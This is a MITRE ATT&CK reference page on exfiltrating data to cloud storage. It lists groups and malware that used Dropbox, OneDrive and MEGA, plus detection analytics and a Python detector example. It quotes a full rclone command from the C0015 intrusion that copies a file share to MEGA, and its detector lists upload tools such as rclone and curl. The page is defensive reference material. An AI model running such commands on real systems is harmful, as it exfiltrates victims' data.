Exfiltration Over Web Service: Exfiltration to Cloud Storage

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, editing, and retrieval of data on a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

ID: T1567.002
Sub-technique of: T1567
Tactic: Exfiltration
Platforms: ESXi, Linux, Windows, macOS
Version: 1.3
Created: 09 March 2020
Last Modified: 24 October 2025

Procedure Examples

ID Name Description
G1024 Akira

Akira will exfiltrate victim data using applications such as Rclone.[1]

C0040 APT41 DUST

APT41 DUST exfiltrated collected information to OneDrive.[2]

S0635 BoomBox

BoomBox can upload data to dedicated per-victim folders in Dropbox.[3]

S0651 BoxCaon

BoxCaon has the capability to collect the contents of folders on the system and upload the results to its Dropbox drive.[4]

C0015 C0015

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M.[5]

G0114 Chimera

Chimera has exfiltrated stolen data to OneDrive accounts.[6]

G1021 Cinnamon Tempest

Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS.[7]

S0660 Clambling

Clambling can send files from a victim's machine to Dropbox.[8][9]

G0142 Confucius

Confucius has exfiltrated victim data to cloud storage service accounts.[10]

G1052 Contagious Interview

Contagious Interview has exfiltrated stolen passwords to Dropbox.[11]

S1023 CreepyDrive

CreepyDrive can use cloud services including OneDrive for data exfiltration.[12]

S0538 Crutch

Crutch has exfiltrated stolen data to Dropbox.[13]

G1006 Earth Lusca

Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.[14]

G1003 Ember Bear

Ember Bear has used tools such as Rclone to exfiltrate information from victim environments to cloud storage such as mega.nz.[15]

S0363 Empire

Empire can use Dropbox for data exfiltration.[16]

G0046 FIN7

FIN7 has exfiltrated stolen data to the MEGA file sharing site.[17]

G0125 HAFNIUM

HAFNIUM has exfiltrated data to file sharing sites, including MEGA.[18]

S0037 HAMMERTOSS

HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.[19]

G1001 HEXANE

HEXANE has used cloud services, including OneDrive, for data exfiltration.[12]

G0119 Indrik Spider

Indrik Spider has exfiltrated data using Rclone or MEGASync prior to deploying ransomware.[20]

G0094 Kimsuky

Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts.[21] Kimsuky has also leveraged Dropbox for uploading victim system information.[22]

G0065 Leviathan

Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.[23][24]

G1014 LuminousMoth

LuminousMoth has exfiltrated data to Google Drive.[25]

G1051 Medusa Group

Medusa Group has utilized Rclone to exfiltrate data from victim environments to cloud storage.[26][27]

G0129 Mustang Panda

Mustang Panda has exfiltrated archived files to cloud services such as Dropbox using curl.[28][29]

S0340 Octopus

Octopus has exfiltrated data to file sharing sites.[30]

S1170 ODAgent

ODAgent can use an attacker-controlled OneDrive account for exfiltration.[31]

S1172 OilBooster

OilBooster can exfiltrate files to an actor-controlled OneDrive account via the Microsoft Graph API.[31]

C0022 Operation Dream Job

During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.[32][33]

S1102 Pcexter

Pcexter can upload stolen files to OneDrive storage accounts via HTTP POST.[34]

G1005 POLONIUM

POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.[12]

S0629 RainyDay

RainyDay can use a file exfiltration tool to upload specific files to Dropbox.[35]

S1040 Rclone

Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.[36][5]

S1222 RIFLESPINE

RIFLESPINE can upload results from executed C2 commands to cloud storage.[37]

S0240 ROKRAT

ROKRAT can send collected data to cloud storage services such as PCloud.[38][39]

G1015 Scattered Spider

Scattered Spider has exfiltrated victim data to the MEGA file sharing site, SnowFlake, and AWS S3 buckets.[40][41][42]

G1053 Storm-0501

Storm-0501 has exfiltrated stolen data to the MEGA file sharing site.[43] Storm-0501 has also utilized Rclone to exfiltrate data from victim environments to cloud storage such as MegaSync.[44] Storm-0501 has additionally exfiltrated data to its own infrastructure using the AzCopy command-line tool (CLI).[45]

G0027 Threat Group-3390

Threat Group-3390 has exfiltrated stolen data to Dropbox.[8]

G1022 ToddyCat

ToddyCat has used a DropBox uploader to exfiltrate stolen files.[34]

G0010 Turla

Turla has used WebDAV to upload stolen USB files to a cloud drive.[46] Turla has also exfiltrated stolen files to OneDrive and 4shared.[47]

G0102 Wizard Spider

Wizard Spider has exfiltrated stolen victim data to various cloud storage providers.[48]

G0128 ZIRCONIUM

ZIRCONIUM has exfiltrated stolen data to Dropbox.[49]

Mitigations

ID Mitigation Description
M1021 Restrict Web-Based Content

Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.

Detection Strategy

ID Name Analytic ID Analytic Description
DET0570 Detection Strategy for Exfiltration to Cloud Storage

AN1571

Unusual processes (e.g., powershell.exe, excel.exe) accessing large local files and subsequently initiating HTTPS POST requests to domains associated with cloud storage services (e.g., dropbox.com, drive.google.com, box.com). Defender perspective: correlation between file reads in sensitive directories and high outbound traffic volume to known storage APIs.

AN1572

Processes such as curl, wget, rclone, or custom scripts executing uploads to cloud storage endpoints. Defender perspective: detect chained events where tar/gzip is executed to compress files followed by HTTPS PUT/POST requests to known storage services.

AN1573

Applications or scripts invoking cloud storage APIs (Dropbox sync, iCloud, Google Drive client) in unexpected contexts. Defender perspective: detect sensitive file reads by non-standard applications followed by unusual encrypted uploads to external cloud storage domains.

AN1574

Unusual ESXi processes (vmx, hostd) reading datastore files and generating outbound HTTPS traffic toward external cloud storage endpoints. Defender perspective: anomalous datastore activity followed by network transfers to Dropbox, AWS S3, or other storage services.
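As an added example (not part of the ATT&CK page or any cited report), the following Python correlates constructed endpoint telemetry into the chained pattern AN1571 to AN1573 describe: a sensitive file read or archiver run followed by an HTTPS POST/PUT from the same host to a cloud storage domain, or any such upload by a transfer tool like rclone, curl or wget. The domain list, sensitive directories, event schema and sample events are assumptions; only the rclone command line is taken from the C0015 entry above.

```python
# Correlates endpoint telemetry into the chained pattern AN1571-AN1573 describe:
# staging (sensitive read or archiver run) then an HTTPS POST/PUT to a cloud storage
# domain from the same host, or any such upload by a known transfer tool.
from datetime import datetime, timedelta

CLOUD_DOMAINS = {"dropbox.com", "drive.google.com", "box.com", "mega.nz", "s3.amazonaws.com"}
UPLOAD_TOOLS = {"rclone.exe", "rclone", "curl.exe", "curl", "wget.exe", "wget"}
ARCHIVERS = {"tar", "gzip", "7z.exe", "zip", "rar.exe"}
SENSITIVE_DIRS = ("/srv/finance/", "C:\\Users\\", "\\\\SERVER\\Shares")  # assumed per-site list
WINDOW = timedelta(minutes=10)  # how long after staging an upload is still correlated

def is_cloud_storage(host):
    return any(host == d or host.endswith("." + d) for d in CLOUD_DOMAINS)

def staging_reasons(past, now):
    """Earlier same-host events inside WINDOW that look like collection or staging."""
    reasons = []
    for e in (p for p in past if now - p["ts"] <= WINDOW):
        if e["type"] == "file_read" and e["path"].startswith(SENSITIVE_DIRS):
            reasons.append(f"{e['image']} read {e['path']}")
        elif e["type"] == "process" and e["image"] in ARCHIVERS:
            reasons.append(f"archiver {e['image']}: {e['cmdline']}")
    return reasons

def detect(events):
    alerts, history = [], {}  # history: host -> events seen so far, in time order
    for e in sorted(events, key=lambda x: x["ts"]):
        past = history.setdefault(e["host"], [])
        if e["type"] == "net_conn" and e["method"] in ("POST", "PUT") and is_cloud_storage(e["dst"]):
            reasons = staging_reasons(past, e["ts"])
            if e["image"] in UPLOAD_TOOLS:  # AN1572: transfer tool talking to storage
                reasons.append(f"upload tool {e['image']}")
            if reasons:  # a browser sync with no prior staging produces no alert
                alerts.append({"host": e["host"], "image": e["image"], "dst": e["dst"], "why": reasons})
        past.append(e)
    return alerts

def ev(ts, host, kind, **f):
    return {"ts": datetime.fromisoformat(ts), "host": host, "type": kind, **f}

SAMPLE_EVENTS = [  # constructed telemetry; the rclone command line is the one quoted for C0015
    ev("2025-01-10T09:00:00", "srv01", "process", image="rclone.exe",
       cmdline='rclone.exe copy --max-age 2y "\\\\SERVER\\Shares" Mega:DATA -q'),
    ev("2025-01-10T09:00:05", "srv01", "net_conn", image="rclone.exe", dst="g.api.mega.nz", method="POST"),
    ev("2025-01-10T09:10:00", "ws02", "file_read", image="excel.exe", path="C:\\Users\\alice\\payroll.xlsx"),
    ev("2025-01-10T09:12:00", "ws02", "net_conn", image="excel.exe", dst="drive.google.com", method="POST"),
    ev("2025-01-10T09:20:00", "ws01", "process", image="tar", cmdline="tar czf /tmp/f.tgz /srv/finance"),
    ev("2025-01-10T09:21:00", "ws01", "net_conn", image="python3", dst="content.dropbox.com", method="PUT"),
    ev("2025-01-10T09:30:00", "ws03", "net_conn", image="chrome.exe", dst="drive.google.com", method="POST"),
]
```

Running `detect(SAMPLE_EVENTS)` yields three alerts (srv01, ws02, ws01); the ws03 browser upload has no preceding staging on that host and is left alone, which is the false-positive trade-off the "Defender perspective" notes above describe.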

References

  1. Secureworks. (n.d.). GOLD SAHARA. Retrieved February 20, 2024.
  2. Mike Stokkel et al. (2024, July 18). APT41 Has Arisen From the DUST. Retrieved September 16, 2024.
  3. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
  4. CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
  5. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
  6. Jansen, W. (2021, January 12). Abusing cloud services to fly under the radar. Retrieved September 12, 2024.
  7. Biderman, O. et al. (2022, October 3). REVEALING EMPEROR DRAGONFLY: NIGHT SKY AND CHEERSCRYPT - A SINGLE RANSOMWARE GROUP. Retrieved December 6, 2023.
  8. Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
  9. Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.
  10. Lunghi, D. and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021.
  11. Amaury G., Coline Chavane, Felix Aimé and Sekoia TDR. (2025, March 31). From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic. Retrieved April 1, 2025.
  12. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
  13. Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.
  14. Chen, J. et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.
  15. US Cybersecurity & Infrastructure Security Agency et al. (2024, September 5). Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure. Retrieved September 6, 2024.
  16. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
  17. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
  18. MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
  19. FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024.
  20. Mandiant Intelligence. (2022, June 2). To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions. Retrieved July 29, 2024.
  21. An, J. and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
  22. Den Iuzvyk, Tim Peck. (2025, February 13). Analyzing DEEP#DRIVE: North Korean Threat Actors Observed Exploiting Trusted Platforms for Targeted Attacks. Retrieved August 19, 2025.
  23. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
  24. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
  25. Botezatu, B. et al. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022.
  26. Cybersecurity and Infrastructure Security Agency. (2025, March 12). AA25-071A #StopRansomware: Medusa Ransomware. Retrieved October 15, 2025.
  27. Threat Hunter Team Symantec and Carbon Black. (2025, March 6). Medusa Ransomware Activity Continues to Increase. Retrieved October 15, 2025.
  28. Lior Rochberger, Tom Fakterman, Robert Falcone. (2023, September 22). Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda. Retrieved September 9, 2025.
  29. Tom Fakterman. (2024, September 6). Chinese APT Abuses VSCode to Target Government in Asia. Retrieved March 24, 2025.
  30. Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
  31. Hromcova, Z. and Burgher, A. (2023, December 14). OilRig’s persistent attacks using cloud service-powered downloaders. Retrieved November 26, 2024.
  32. Breitenbacher, D. and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
  33. ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
  34. Dedola, G. et al. (2023, October 12). ToddyCat: Keep calm and check logs. Retrieved January 3, 2024.
  35. Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.
  36. Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.
  37. Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024.
  38. Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.
  39. Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.
  40. CISA. (2023, November 16). Cybersecurity Advisory: Scattered Spider (AA23-320A). Retrieved March 18, 2024.
  41. Microsoft. (2023, October 25). Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction. Retrieved March 18, 2024.
  42. Counter Adversary Operations. (2025, July 2). CrowdStrike Services Observes SCATTERED SPIDER Escalate Attacks Across Industries. Retrieved October 13, 2025.
  43. Tyler McLellan, Brandan Schondorfer. (2021, November 29). Kitten.gif: Meet the Sabbath Ransomware Affiliate Program, Again. Retrieved October 19, 2025.
  44. Microsoft Threat Intelligence. (2024, September 26). Storm-0501: Ransomware attacks expanding to hybrid cloud environments. Retrieved October 19, 2025.
  45. Microsoft Threat Intelligence. (2025, August 27). Storm-0501’s evolving techniques lead to cloud-based ransomware. Retrieved October 19, 2025.
  46. Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.
  47. Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
  48. Shilko, J. et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.
  49. Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.